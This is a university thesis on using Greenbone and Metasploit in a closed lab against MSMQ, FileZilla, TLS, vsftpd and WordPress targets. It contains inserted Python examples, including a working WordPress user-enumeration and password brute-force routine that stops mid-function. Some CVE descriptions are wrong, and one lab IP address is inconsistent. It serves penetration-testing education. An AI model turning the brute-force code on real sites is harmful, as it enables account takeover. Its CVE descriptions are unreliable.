Bachelor’s Thesis
Information and Communications Technology
2024
Khiem Bui
Combining Greenbone and Metasploit for Enhanced Penetration Testing: A Lab-Based Evaluation
Bachelor’s Thesis | Abstract
Turku University of Applied Sciences
Information and Communications Technology
2024 | 52 pages
Khiem Bui
Combining Greenbone and Metasploit for Enhanced Penetration Testing: A Lab-Based Evaluation
Penetration testing is a crucial component of any cybersecurity strategy, enabling organizations to identify vulnerabilities in their systems before attackers can exploit them. This thesis has two primary objectives:
• To explore the combined use of Greenbone Vulnerability Management (GVM) and the Metasploit Framework (MF) in assessing the security of a target system.
• To evaluate the effectiveness of integrating these two popular vulnerability scanning and penetration testing tools within a controlled lab environment.
By combining the vulnerability assessment capabilities of GVM with the exploitation tools provided by Metasploit, the thesis demonstrates an approach to penetration testing that can help organizations strengthen their overall security posture and better protect their critical assets from potential cyber threats.
Keywords:
Penetration Testing, Pentest, Metasploit, Vulnerability Management,
Vulnerability Assessment.
Contents
List of abbreviations 6
1 Introduction 7
2 Penetration Testing Concept and Security Standards 10
2.1 Introduction to Penetration Testing 10
2.2 Penetration Testing Methodologies 11
2.3 Introduction to Vulnerability Management 12
2.4 Overview of Greenbone 12
2.5 Overview of the Metasploit Framework 12
3 Methodology 13
3.1 Research Design 13
3.2 Data Collection 13
3.3 Setup and Configuration of Greenbone and the Metasploit Framework 13
3.4 Penetration Testing Process 23
4 System Test 27
4.1 Network Diagram 27
4.2 IP Address and Services 28
5 Test Scenario 29
5.1 CVE-2023-21554 - Microsoft Message Queuing Remote Code Execution Vulnerability 29
5.2 CVE-2005-3589 - FileZilla FTP Server Admin Interface Denial of Service (DoS) 31
5.3 CVE-2011-3389 - Exploit for SSL/TLS Version Detection 33
5.4 CVE-2011-2523 - vsftpd 2.3.4 35
5.5 WordPress User Enumeration 38
6 Conclusion 48
Tool Enhancement 48
Expanding the Scope 48
Training and Continuous Improvement 48
References 50
Figures
Figure 1. Downloaded GSM ONE Virtual Appliance file.
Figure 2. Import Greenbone Vulnerability Management Appliance to VMware.
Figure 3. Welcome to Greenbone Vulnerability Management.
Figure 4. Setup Wizard with new machine.
Figure 5. Create a new account for access to the global web admin.
Figure 6. New admin login global web page.
Figure 7. Configure the settings of your Greenbone Enterprise Appliance.
Figure 8. Configure IPv4 as dynamic.
Figure 9. The Dashboard of GVM.
Figure 10. Self-check of the database on GVM before scanning.
Figure 11. Login to the system with user credentials and MF running.
Figure 12. The task scans 4 virtual machines: Windows 10, Windows Server 2022, Kali Linux and Ubuntu.
Figure 13. Report based on the vulnerability.
Figure 14. Prioritization based on CVSS and severity.
Figure 15. Over 196,000 vulnerability tests (CVE).
Figure 16. The payload from Metasploit will be used.
Figure 17. Network diagram physical topology.
Figure 18. The payload used to attack CVE-2023-21554.
Figure 19. MSMQ is patched.
Figure 20. Event log from the Windows 10 client.
Figure 21. Use the FileZilla payload to exploit.
Figure 22. Configuration of values such as the remote host and port used.
Figure 23. The message from the FileZilla Server dashboard.
Figure 24. Use an auxiliary module to scan SSL.
Figure 25. SSL version support.
Figure 26. The result after the attack.
Figure 27. Scan with Nmap to find out the details of vsftpd 2.3.4.
Figure 28. vsftpd banner and message.
Figure 29. The anonymous user can log in to the system.
Figure 30. Webpage is running Apache.
Figure 31. The information from the Nikto scan.
Figure 32. WordPress scanner information.
Figure 33. Detected WordPress 6.5.3.
Figure 34. WordPress login enumeration.
Figure 35. Choose the username and password file.
Figure 36. WordPress brute force is successful.
Figure 37. Unable to log in with the username and password from the MF machine to the Ubuntu machine.
Figure 38. Login to the admin portal with the username "demo" and password "123".
Tables
Table 1. IP addressing of the lab environment.
List of abbreviations
BCBA Blockwise Chosen-Boundary Attack
CVE Common Vulnerabilities and Exposures
CVSS Common Vulnerability Scoring System
GVM Greenbone Vulnerability Management
HTTP Hypertext Transfer Protocol
HTTPS Hypertext Transfer Protocol Secure
ISECOM Institute for Security and Open Methodologies
MF Metasploit Framework
MSMQ Microsoft Message Queuing
NIST National Institute of Standards and Technology
SSL Secure Sockets Layer
Pentest Penetration Testing
VM Vulnerability Management
OSSTMM Open Source Security Testing Methodology Manual
OWASP Open Web Application Security Project
1 Introduction
Nowadays, technology is always changing, and cybersecurity is constantly evolving to address the growing threats posed by malware, artificial intelligence, and machine learning. (Prnewrise 2024; Splashtop 2024) Penetration testing (pentest) is a method of verifying that a system is secure: that it has no known vulnerabilities or misconfigurations, is up to date, and is checked regularly. It is the best approach for identifying a system's vulnerabilities and weaknesses that could be exploited by attackers. (Hackerone, n.d). In this context, Greenbone Vulnerability Management (GVM) and the Metasploit Framework (MF) have emerged as powerful tools for conducting pentests and managing vulnerabilities.
Studying data networks and security raises awareness of the importance of protecting data in enterprises. As part of the digital transformation trend, organizations must have a plan to manage security in hybrid environments that combine on-premises systems with private and public clouds. In addition, as cyber threats are becoming more sophisticated and prevalent, organizations must proactively identify and remediate vulnerabilities to safeguard their sensitive data and systems. (Threatintelligence, 2023). However, many companies are still not fully aware of the importance of security measures. Combining the GVM and MF tools can therefore help them protect their systems more effectively, save money, and reduce the costs associated with security breaches and operational disruptions. The objectives of this thesis are to coordinate security testing tools and to contribute to the advancement of organizations' effective pentest methodologies. This includes payloads for exploitation, as well as risk-level assessments and the development of robust security tactics.
The thesis will focus on the following content areas: the features of the GVM and the MF, the potential benefits of their combination, their implementation and configuration, security best practices, and case studies of the combined use of these systems. In addition, it will help to identify and assess the vulnerabilities present in the lab environment so that appropriate actions can be taken for real systems.
Turku University of Applied Sciences Thesis | Khiem Bui
The hypothesis of this thesis is that combining GVM and MF will increase the success rate of exploitation attempts and improve the pentest's overall efficiency. The other systems deployed, namely Microsoft Windows Server 2022 Standard, Microsoft Windows 10 Client, and Ubuntu 20.04.6 Desktop, together with installed services that have a vulnerability, such as FileZilla Server, Microsoft Message Queuing (MSMQ), and web services, emulate clients in real scenarios.
The thesis is structured as follows:
• Chapter 1 introduces the topic, including the thesis objectives, justification
for the research, and the resources for the lab environment.
• Chapter 2 presents a comprehensive review of the pentest concept and
security standards, the GVM and the MF, highlighting their capabilities and
features.
• Chapter 3 explores the methodology including research design, data
collection, and challenges of integrating these tools, along with practical
implementation considerations.
• Chapter 4 presents the test system for this thesis.
• Chapter 5 presents case studies illustrating the combined use of the GVM
and the MF.
• Chapter 6 analyzes the results, draws conclusions, and proposes
recommendations for future research and practical application of the
integrated pentest approach.
The proof of concept conducted in the lab environment aims to demonstrate the feasibility of coordinating the use of these powerful tools. The aim of this thesis is to contribute to the advancement of organizations' effective pentest methodologies. It includes utilizing payloads for exploitation, as well as assessment through risk-level analysis and the development of an organization's security strategies.
2 Penetration Testing Concept and Security Standards
This chapter covers basic knowledge: the definitions of pentest and vulnerability management, the different security standards under which pentests are implemented, and an overview of the GVM and the MF. This section provides sufficient theoretical knowledge and guidance for the practical part, the system test.
2.1 Introduction to Penetration Testing
Penetration testing is an authorized simulated attack, using the methods and techniques an attacker would use to exploit a system, network, database, or web application, performed to evaluate the security of the system. Depending on the scope and purpose of the project, there are three types of pentest: black box, white box, and gray box.
2.1.1 Black box
"In this technique, the testers did not have any insights into the code, architecture, or system design." They enter the scenario as unauthorized, external users. (Imperva, n.d). This technique can be used for brute force attacks, password cracking, fuzzing, vulnerability scanning, and performance testing. The attackers can combine multiple techniques and tools to help them find the gaps and misconfigurations in the system.
2.1.2 White box
The testers are ethical hackers and "have full knowledge of the system design, network architecture, and services inside the network". The white box approach allows the pentester to identify risks and security weaknesses that may not be apparent with other testing methods such as black box and gray box, which helps improve the organization's security. (Bluegoatcyber, n.d). Moreover, it helps ensure compliance with security standards such as those of the International Organization for Standardization and the National Institute of Standards and Technology (NIST).
2.1.3 Gray box
"The testers may have limited or partial knowledge of the target of their attacks". This method is used for debugging software or for evaluating a vulnerability. (Tidmarsh, 2023). A gray box pentest is a combination of the black box and white box methodologies.
2.2 Penetration Testing Methodologies
A pentest is a security test that can be performed manually or using automated tools and that follows a pentest methodology. (IBM, n.d). The scope and methodology depend on the organization. In this thesis, we will focus on the top three methodologies and standards frequently used in organizations. (Barahona, 2022)
2.2.1 OSSTMM (Open Source Security Testing Methodology Manual)
The Open Source Security Testing Methodology Manual (OSSTMM) is a peer-
reviewed methodology for performing pentest, security testing, and analysis.
Created by the Institute for Security and Open Methodologies (ISECOM), the
OSSTMM focuses on testing the operational security of systems and applications
from an attacker's perspective. (Herzog, n.d)
2.2.2 OWASP (Open Web Application Security Project)
The Open Web Application Security Project (OWASP) is an open-source organization focused on improving web application security. OWASP maintains a comprehensive Testing Guide that outlines a methodology for testing the security of web applications. (OWASP, n.d)
2.2.3 NIST (National Institute of Standards and Technology)
The National Institute of Standards and Technology (NIST) is a government agency that promotes standards in many areas, including computer security. NIST Special Publication 800-115 was written to provide technical guidelines for conducting pentests, vulnerability analysis, and mitigation strategies. (Scarfone et al. 2008)
2.3 Introduction to Vulnerability Management
Vulnerability Management (VM) is a process that involves scanning a company's network infrastructure to identify potential security weaknesses or vulnerabilities. The goal of vulnerability management is to identify security weaknesses in the network infrastructure and to minimize the damage if a breach does occur. (Wikipedia, n.d)
2.4 Overview of Greenbone
The Greenbone Vulnerability Management (GVM) is a network vulnerability
scanning framework that was initially created as a community initiative called
OpenVAS. It is primarily designed and maintained by Greenbone Networks.
(Greenbone, n.d)
2.5 Overview of the Metasploit Framework
Metasploit Framework (MF) is Ruby-based, and it contains a suite of tools used
to test security vulnerabilities, enumerate networks, execute attacks, and evade
detection. At its core, the Metasploit Framework is a collection of commonly used
tools that provide a complete environment for manual pentest and exploit
development. (Rapid7, n.d).
3 Methodology
3.1 Research Design
Because of the nature of VM and pentest research, the most appropriate research design is an experimental design in a lab environment. It allows researchers to manipulate variables, control conditions, measure the impact of specific interventions or approaches, and choose templates. By employing an experimental design, researchers can systematically compare different pentest techniques, tools, security standards, or methodologies to determine their relative effectiveness in identifying vulnerabilities, exploiting the system to validate the severity of a vulnerability, and improving overall system security.
3.2 Data Collection
The lab environment is a local system built on VMware and is not reachable from the internet. The types of data collected include network traffic, system logs, and vulnerability scans.
3.3 Setup and Configuration of Greenbone and the Metasploit Framework
3.3.1 Setup Greenbone
Installing the virtual appliance starts with importing the previously downloaded virtual appliance software. The downloaded files can be seen in Figure 1 below.
Figure 1. Downloaded GSM ONE Virtual Appliance file.
The following steps (Figure 2) can be used to install the virtual appliance on the lab environment hypervisor host. The user opens VMware Workstation, selects 'File' and then 'Open', and then navigates to and selects the file named GSM-ONE.
Figure 2. Import Greenbone Vulnerability Management Appliance to VMware.
In the next step (Figure 3) the user provides the name and local storage location of the virtual machine in the lab, clicks Import, and waits for completion. After the import of the GSM-ONE file is completed, the user starts the virtual machine.
Figure 3. Welcome to Greenbone Vulnerability Management.
The following steps (Figure 4) configure the user login on the GVM. The user selects the setup wizard to configure the full functionality of the new machine.
Figure 4. Setup Wizard with new machine.
By default, the account "admin" is the first account with permission to set up, install a license, back up, and upgrade the device. We need to create a new user login (Figure 5) for the global web admin to perform tasks over the network.
Figure 5. Create a new account for access to the global web admin.
The user can choose a new account to access the web page. As a security best practice, this username should have a different role than the admin account used in the console. As this is a lab environment, we can use the same username and password. Here (Figure 6) the user is prompted to create the admin credentials.
Figure 6. New admin login global web page.
The next few screenshots show the IP address configuration. The user selects 'Setup' (Figure 7), then chooses Network to configure the network settings and Interfaces to configure the network interface.
Figure 7. Configure the settings of your Greenbone Enterprise Appliance.
In this lab environment, we will use an IP address from the Dynamic Host Configuration Protocol (Figure 8) and ensure it is in the same network as the other machines.
Figure 8. Configure IPv4 as dynamic.
The GVM web interface is launched by browsing to the appliance's IP address for the first time. The user starts the GVM virtual appliance configuration in the web browser (Figure 9) by typing the address https://192.168.112.140 into the address field. The default credentials used to log in are the username and password "admin".
Figure 9. The Dashboard of GVM.
Before the GVM appliance can communicate with other systems in the local area network, the configuration (Figure 10) needs to be finalized. Additionally, the vulnerability database from Greenbone Networks needs to be updated to make sure it is the newest.
Figure 10. Self-check of the database on GVM before scanning.
3.3.2 Setup Metasploit Framework
Installing the Metasploit Framework starts with unzipping the previously downloaded virtual appliance software. The user logs in to the Kali Linux machine (Figure 11) with the username and password "kali" to ensure the Metasploit Framework is running.
Figure 11. Login to the system with user credentials and MF running.
3.4 Penetration Testing Process
Here is an overview of the penetration testing process using Greenbone Vulnerability Management (GVM) and the Metasploit Framework (MF). There are four pentest phases: information collection, identification and analysis of the vulnerability, exploit or attack to verify the vulnerability, and report and remediation. More details are provided below.
3.4.1 Information collection
The user used GVM to perform network scanning and gather information about the target systems (Figure 12), such as open ports, running services, versions in use, operating systems, banner information, and potential vulnerabilities. We scanned four targets: Windows Server 2022 Standard, Kali Linux, Windows 10 Client, and Ubuntu 20.04.6. The GVM appliance itself was therefore not included in the results.
Figure 12. The task scans 4 virtual machines: Windows 10, Windows Server 2022, Kali Linux and Ubuntu.
3.4.2 Identify and Analyze the Vulnerability
The user selected the "Scans" menu and clicked "Tasks" to ensure all tasks were done before going to "Vulnerabilities". This step aims to find the vulnerabilities of all machines. Next, the user analyzes the results of GVM (Figure 13) to identify potential attack vectors and to find the supporting module for the pentest.
Figure 13. Report based on the vulnerability.
In this report, we can see all medium severity vulnerabilities on three machines
including a Windows 10 Client, a Windows Server, and an Ubuntu device.
The user prioritizes vulnerabilities (Figure 14) based on factors like exploitability, impact, Common Vulnerabilities and Exposures (CVE), Common Vulnerability Scoring System (CVSS) scores, and risk level. (Balbix, n.d). The user can see the details of the report per host, including the vulnerability, open ports, the name of the running application, and the version used. The user then searches the list of exploits in Metasploit for modules matching the vulnerabilities that can be used for the pentest. The following vulnerabilities can be exploited in this lab environment:
• DCE/RPC and MSRPC Services Enumeration Reporting.
• FTP with filezilla_server:0.9.39 DDoS.
• SSL/TLS Deprecated TLSv1.0 and TLSv1.1 Protocol Detection.
• Anonymous FTP Login with vsftpd:2.3.4.
• Brute force attack with WordPress:6.5.3.
Figure 14. Prioritization based on CVSS and severity.
Over 196,000 vulnerability tests (Figure 15) help us determine the best approach
to exploiting vulnerabilities in the lab environment.
Figure 15. Over 196,000 vulnerability tests (CVE).
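The prioritization step above (CVSS score and severity first, then a Metasploit module search per finding) can be scripted against a GVM report export. The following is an added example, not code from the thesis, Greenbone or Rapid7; the XML is a constructed sample that only follows the general shape of a GVM XML report (`<result>` with `<host>`, `<port>`, `<threat>`, `<severity>` and an `<nvt>` carrying `<cvss_base>` and CVE `<ref>` entries), which is an assumption about the format, and the hosts mirror Table 1.

```python
"""Rank GVM scan results by severity and turn them into msfconsole searches.

Added example. The report XML below is constructed; a real GVM export has many
more fields, so treat its structure as an assumption. 'search cve:YYYY-NNNN'
is msfconsole's own search syntax.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

THREAT_RANK = {"High": 3, "Medium": 2, "Low": 1, "Log": 0}

# Constructed sample report: the lab's Ubuntu, Windows 10 and Windows Server hosts.
SAMPLE_REPORT = """<report>
 <results>
  <result id="c1">
   <name>vsftpd Compromised Source Packages Backdoor Vulnerability</name>
   <host>192.168.112.141</host><port>21/tcp</port>
   <nvt><cvss_base>10.0</cvss_base><refs><ref type="cve" id="CVE-2011-2523"/></refs></nvt>
   <threat>High</threat><severity>10.0</severity>
  </result>
  <result id="c2">
   <name>FileZilla Server Admin Interface Denial of Service</name>
   <host>192.168.112.137</host><port>14147/tcp</port>
   <nvt><cvss_base>5.0</cvss_base><refs><ref type="cve" id="CVE-2005-3589"/></refs></nvt>
   <threat>Medium</threat><severity>5.0</severity>
  </result>
  <result id="c3">
   <name>SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection</name>
   <host>192.168.112.138</host><port>443/tcp</port>
   <nvt><cvss_base>4.3</cvss_base><refs><ref type="cve" id="CVE-2011-3389"/></refs></nvt>
   <threat>Medium</threat><severity>4.3</severity>
  </result>
  <result id="c4">
   <name>WordPress Detection</name>
   <host>192.168.112.141</host><port>80/tcp</port>
   <nvt><cvss_base>0.0</cvss_base><refs/></nvt>
   <threat>Log</threat><severity>0.0</severity>
  </result>
 </results>
</report>
"""


@dataclass
class Finding:
    host: str
    port: str
    name: str
    severity: float
    threat: str
    cves: list


def parse_results(xml_text):
    """Extract one Finding per <result> element of the report."""
    findings = []
    for r in ET.fromstring(xml_text).iter("result"):
        nvt = r.find("nvt")
        cves = [] if nvt is None else [
            ref.get("id") for ref in nvt.iter("ref") if ref.get("type") == "cve"]
        findings.append(Finding(
            host=(r.findtext("host") or "").strip(),
            port=(r.findtext("port") or "").strip(),
            name=(r.findtext("name") or "").strip(),
            severity=float(r.findtext("severity") or 0.0),
            threat=(r.findtext("threat") or "Log").strip(),
            cves=cves,
        ))
    return findings


def prioritize(findings, min_severity=4.0):
    """Drop informational results, then sort by severity, threat level and CVE count."""
    kept = [f for f in findings if f.severity >= min_severity]
    return sorted(kept, reverse=True,
                  key=lambda f: (f.severity, THREAT_RANK.get(f.threat, 0), len(f.cves)))


def msf_search_commands(findings):
    """One msfconsole 'search cve:YYYY-NNNN' per distinct CVE, in priority order."""
    cmds = []
    for f in findings:
        for cve in f.cves:
            cmd = "search cve:" + cve.replace("CVE-", "", 1)
            if cmd not in cmds:
                cmds.append(cmd)
    return cmds


if __name__ == "__main__":
    ranked = prioritize(parse_results(SAMPLE_REPORT))
    for f in ranked:
        print(f"{f.severity:>4}  {f.threat:<6} {f.host}:{f.port}  {f.name}")
    print("\n".join(msf_search_commands(ranked)))
```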
3.4.3 Exploit or attack to verify the vulnerability
The user selected a Metasploit Framework payload and shellcode (Figure 16) to launch exploits against the identified vulnerabilities.
Figure 16. The payload from Metasploit will be used.
3.4.4 Report and Remediation
The pentest process is documented, including the tools used, the person in charge, the scope of the pentest, the number of vulnerabilities, the exploits used, and the evidence.
4 System Test
Five different systems were tested during the test period: Microsoft Windows Server 2022 Standard running services, Microsoft Windows 10 as a client, Ubuntu 20.04.6 running web services, Kali Linux with Metasploit installed and used for attacks, and Greenbone GSM ONE 22.04.2 used for scanning vulnerabilities.
4.1 Network Diagram
The following section describes the network as implemented for the thesis; the physical topology is shown in Figure 17.
Figure 17. Network diagram physical topology.
Five machines were interconnected over a private network (LAN) set up for this thesis using a TP-Link router's wireless connection. The test machines have a default networking configuration, which supports dynamic IP assignment to virtual machines.
4.2 IP Address and Services
The entire infrastructure is set up on the class 'C' private network address block 192.168.112.0/24.
Table 1. IP addressing of the lab environment.
Computer Name                  IP Address        Function / Services
Greenbone ONE                  192.168.112.140   Vulnerability Scan
Kali Linux                     192.168.112.136   Metasploit, Nmap
Windows 10 Client              192.168.112.137   MSMQ, FileZilla Server 0.9.39
Windows Server 2022 Standard   192.168.112.138   IIS, Remote Desktop
Ubuntu 20.04.6                 192.168.112.141   VSFTPD v2.3.4, WordPress
5 Test Scenario
The thesis provides detailed information and insights about the benefits of pentesting in the lab environment. Five examples have been chosen for the case studies. These are five vulnerabilities of medium severity, identified after a scan of the system using the GVM (Greenbone Vulnerability Manager) tool. Even though they are of medium severity, some cases can impact the system and crash it.
5.1 CVE-2023-21554 - Microsoft Message Queuing Remote Code Execution Vulnerability
Unauthorized RCE Vulnerability in Microsoft Message Queuing (MSMQ) Service
CVE-2023-21554, aka QueueJumper, is a critical unauthorized remote code execution (RCE) vulnerability with a CVSS score of 9.8. Attack complexity is low, and it does not require any privileges such as administrator rights or user interaction. To exploit this vulnerability, threat actors would send a malicious MSMQ packet to a listening MSMQ service on the client. (Bitdefender, 2023) (Quorumcyber, n.d).
The user checks the result from GVM and finds the exploit command in MF. Next, the user sets the vulnerable remote host (Figure 18) and the port number used for the exploit.
Figure 18. The payload used to attack CVE-2023-21554.
Finally, let us review the options again to make sure we have set them all appropriately. The user enters the 'show options' command (Figure 19), as shown here, and runs the command to exploit.
Figure 19. MSMQ is patched.
After the exploit, the user checks whether the payload was executed on the victim machine (Windows 10 client). In this output (Figure 20), we can see the details from the Event Viewer.
Figure 20. Event log from the Windows 10 client.
The conclusion of this security test is that the MSMQ vulnerability in the client
appears to be patched.
5.2 CVE-2005-3589 - FileZilla FTP Server Admin Interface Denial of Service (DoS)
A buffer overflow in FileZilla Server Terminal 0.9.39 may allow remote attackers to cause a denial of service (terminal crash), so that legitimate users cannot access the service, via a long user FTP command. (NIST, n.d, b).
The user will exploit the Windows 10 Client in this lab environment at
192.168.112.37. The exploit's target (Figure 21) is stored in the RHOSTS
variable. The user sets that parameter, as shown here.
Figure 21. Use the FileZilla payload to exploit.
In this scenario, the victim is Windows 10 with the FileZilla admin interface installed on the local machine. With everything configured, we can launch the attack (Figure 22) to deliver the payload to the target machine.
Figure 22. Configuration of values such as the remote host and port used.
Once the payload execution is completed, the user goes back to Windows 10 (Figure 23), which is running the FileZilla server.
Figure 23. The message from the FileZilla Server dashboard.
In conclusion, the system crashed, and the user was unable to access it.
5.3 CVE-2011-3389 - Exploit for SSL/TLS Version Detection
SSL (Secure Sockets Layer) and TLS (Transport Layer Security) are cryptographic protocols that aim to protect data transmission over networks (such as the Internet). SSL/TLS ensures communication security for connections between a
client (web browser) and a web server. The SSL protocol, as used in certain
configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla
Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC
mode with chained initialization vectors, which allows man-in-the-middle
attackers to obtain plaintext Hypertext Transfer Protocol (HTTP) headers via a
blockwise chosen-boundary attack (BCBA) on a Hypertext Transfer Protocol
Secure (HTTPS) session, in conjunction with JavaScript code that uses (1) the
HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight
WebClient API, aka a "BEAST" attack. (NIST, n.d, a) (Rapid7, 2022).
The user configures Metasploit to launch the attack (Figure 24) and selects the auxiliary/scanner/ssl module. Metasploit supports Tab autocompletion when typing module and variable names.
Figure 24. Use an auxiliary module to scan SSL.
The user sets the remote host (Figure 25) to Windows Server 2022 with IP 192.168.112.138, which has SSL installed.
Figure 25. SSL version support.
The user runs an exploit command (Figure 26) to attack the vulnerability on
Windows Server 2022.
Figure 26. The result after the attack.
As a result, it is demonstrated that transactions cannot be processed through this
port because a timeout occurred.
5.4 CVE-2011-2523 - vsftpd 2.3.4
Very Secure File Transfer Protocol Daemon (VSFTPD) is an FTP server for Unix-like systems, including Linux. This vulnerability allows anonymous users to log in without a password. (Exploit-DB, 2021) (Vigilance, 2011).
The user should double-check by scanning with Nmap (Figure 27) from the MF machine to make sure the Ubuntu machine has vsftpd installed.
Figure 27. Scan with Nmap to find out the details of vsftpd 2.3.4.
Metasploit offers a search facility to identify any Metasploit modules matching a keyword. The user used the vsftpd 2.3.4 exploit (Figure 28) to set the remote host and the remote port, then ran the exploit to create the backdoor and keep the connection.
Figure 28. vsftpd banner and message.
The exploit completed, but no session was created. We can see the details in the message output from Metasploit: 'This server is configured for anonymous only and the backdoor code cannot be reached'. The user should go back to the Kali Linux machine (Figure 29) and use the anonymous user to log in to the Ubuntu machine with IP address 192.168.112.141.
Figure 29. The anonymous user can log in to the system.
In conclusion, even though we did not create a backdoor, anyone can log in to the system as the anonymous user without a password.
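The "anonymous only" behaviour seen above is a vsftpd configuration choice rather than the 2.3.4 backdoor, so the remediation is a configuration check. The following is an added example, not code from the thesis: it audits a vsftpd.conf for the standard vsftpd options anonymous_enable, local_enable, write_enable, anon_upload_enable and anon_mkdir_write_enable, treating a missing anonymous_enable as enabled because that is vsftpd's built-in default. Both sample configurations are constructed.

```python
"""Audit vsftpd.conf for anonymous access and show the hardened equivalent.

Added example. vsftpd.conf is a flat key=value file; the option names used
here are standard vsftpd options. Both sample files below are constructed.
"""

# Constructed: the kind of file that yields "configured for anonymous only".
WEAK_CONF = """\
# vsftpd.conf (constructed sample)
listen=YES
anonymous_enable=YES
local_enable=NO
write_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
"""

# Constructed: the same service with anonymous access and anonymous writes closed.
HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
anon_upload_enable=NO
anon_mkdir_write_enable=NO
"""

# Daemon defaults used when an option is absent; anonymous_enable defaults to YES.
BOOL_DEFAULTS = {
    "anonymous_enable": "YES",
    "local_enable": "NO",
    "write_enable": "NO",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
}


def parse_vsftpd_conf(text):
    """Return option -> value, skipping comments and blank lines."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def is_on(conf, key):
    """vsftpd booleans are YES/NO (also true/false, 1/0), case-insensitive."""
    return conf.get(key, BOOL_DEFAULTS[key]).upper() in ("YES", "TRUE", "1")


def audit_anonymous_access(text):
    """Return findings as strings; an empty list means anonymous access is closed."""
    conf = parse_vsftpd_conf(text)
    findings = []
    if "anonymous_enable" not in conf:
        findings.append("anonymous_enable not set: vsftpd defaults to YES")
    if is_on(conf, "anonymous_enable"):
        findings.append("anonymous_enable=YES: anyone can log in as 'anonymous' without a password")
        if is_on(conf, "write_enable") and is_on(conf, "anon_upload_enable"):
            findings.append("anon_upload_enable=YES with write_enable=YES: anonymous users can upload")
        if is_on(conf, "write_enable") and is_on(conf, "anon_mkdir_write_enable"):
            findings.append("anon_mkdir_write_enable=YES: anonymous users can create directories")
    return findings


def harden(text):
    """Rewrite the file with anonymous login and anonymous writes turned off."""
    conf = parse_vsftpd_conf(text)
    conf.update({"anonymous_enable": "NO",
                 "anon_upload_enable": "NO",
                 "anon_mkdir_write_enable": "NO"})
    return "\n".join(f"{k}={v}" for k, v in conf.items()) + "\n"


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_anonymous_access(conf) or ["no anonymous-access findings"])
```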
5.5 WordPress User Enumeration
User enumeration is a process used by attackers to identify valid usernames and passwords on a system in order to gain unauthorized access. (Hackertarget, 2019).
From the GVM scan report, we can see that the Ubuntu machine has a web service running. The user accesses the website (Figure 30) from the Kali machine.
Figure 30. Webpage is running Apache.
Next, the user uses the Nikto tool (Figure 31) to scan the website for vulnerabilities.
Figure 31. The information from the Nikto scan.
We can see that the Ubuntu machine has WordPress installed and has folders such as 'wordpress', 'wp-admin', and 'wp-content'. In this test case, we used Metasploit to pentest the vulnerability identified in the scan in order to secure the website before it goes public.
We use the WordPress Scanner module (Figure 32), which scans for installed themes, installed plugins, the installed WordPress version, and more information about the target WordPress site.
Figure 32. WordPress scanner information.
The user sets up the remote host as the WordPress website (Figure 33) with IP address 192.168.112.141.
Figure 33. Detected WordPress 6.5.3.
Metasploit also has a WordPress login enumeration module (Figure 34) that not only helps with user enumeration but also brute forces passwords if the password is simple and multifactor authentication is not in use.
Figure 34. WordPress login enumeration.
Because we did not know how many users were in the system, confirming usernames and passwords is a process that takes time on the target WordPress site. For this scenario, we will use usernames and passwords from the wordlist "common.txt" in the existing system and rename two copies of the file as the username and password lists (Figure 35), as shown below.
Figure 35. Choose the username and password file.
The password was found in the Metasploit console (Figure 36): username 'demo' and password '123'.
Figure 36. WordPress brute force is successful.
In this case, we found the username and password but could not log in to the website (Figure 37) from the MF machine because WordPress was installed on the Ubuntu machine on localhost with IP address 127.0.0.1.
Turku University of Applied Sciences Thesis | Khiem Bui
46
Figure 37. Unable to log in from the MF machine to the Ubuntu machine with the found username and password.
Logging in directly via localhost on the Ubuntu machine (Figure 38) with the same username and password does work.
Figure 38. Login to the admin portal with username "demo" and password "123".
The remote attempt therefore failed not because the credentials were wrong, but because the site address was configured as 127.0.0.1, so the installation only serves logins correctly on the Ubuntu host itself. This is a configuration artefact of the lab rather than an access control: on an internet-facing site with its real address configured, the brute-forced pair 'demo'/'123' would have given an attacker access to the admin portal. The practical finding is the weak password and the absence of lockout or multi-factor protection on wp-login.php.
In total, five tests at medium severity level were performed against the lab environment. Two attacks succeeded and three failed.
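The enumeration and brute-force steps of this scenario, together with the loopback-redirect failure mode seen in Figure 37, as an added Python example that is not code from the thesis and not Metasploit's wordpress_login_enum module. It assumes standard WordPress behaviour: /?author=N redirects to /author/<name>/, /wp-json/wp/v2/users lists authors, and a correct wp-login.php POST answers 302 with a wordpress_logged_in cookie and a Location built from the configured site URL. The fake wp-login.php, the credential pair demo/123 and the three-word list standing in for common.txt are constructed so the script runs offline; the transport is injectable, so the same brute_force loop could be pointed at a real host.

```python
"""WordPress user enumeration and login brute force handling (added example)."""
import json
import re
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, List, Optional, Tuple
from urllib.parse import urlparse

Response = Tuple[int, Dict[str, str], str]  # (status, headers, body)
AUTHOR_RE = re.compile(r"/author/([^/?#]+)/?")


def username_from_author_redirect(location: str) -> Optional[str]:
    """/?author=N answers 301 to /author/<user_nicename>/ on a default install."""
    m = AUTHOR_RE.search(urlparse(location).path)
    return m.group(1) if m else None


def usernames_from_rest_users(body: str) -> List[str]:
    """/wp-json/wp/v2/users lists authors with published posts; 'slug' is usually the login name."""
    try:
        entries = json.loads(body)
    except json.JSONDecodeError:
        return []  # endpoint disabled or blocked: an HTML error page, not JSON
    return [e["slug"] for e in entries if isinstance(e, dict) and "slug" in e]


@dataclass
class Credential:
    username: str
    password: str
    redirect_host: Optional[str]  # host in the Location header after a successful login


def login_succeeded(status: int, headers: Dict[str, str]) -> bool:
    """Success: 302 plus a wordpress_logged_in_<hash> cookie. Failure: 200 with the form again."""
    return status == 302 and "wordpress_logged_in" in headers.get("Set-Cookie", "")


def brute_force(send: Callable[[str, str], Response], usernames: Iterable[str],
                passwords: Iterable[str]) -> Optional[Credential]:
    """Try every user/password pair through `send`; stop at the first valid login."""
    passwords = list(passwords)
    for user in usernames:
        for pw in passwords:
            status, headers, _ = send(user, pw)
            if login_succeeded(status, headers):
                host = urlparse(headers.get("Location", "")).hostname
                return Credential(user, pw, host)
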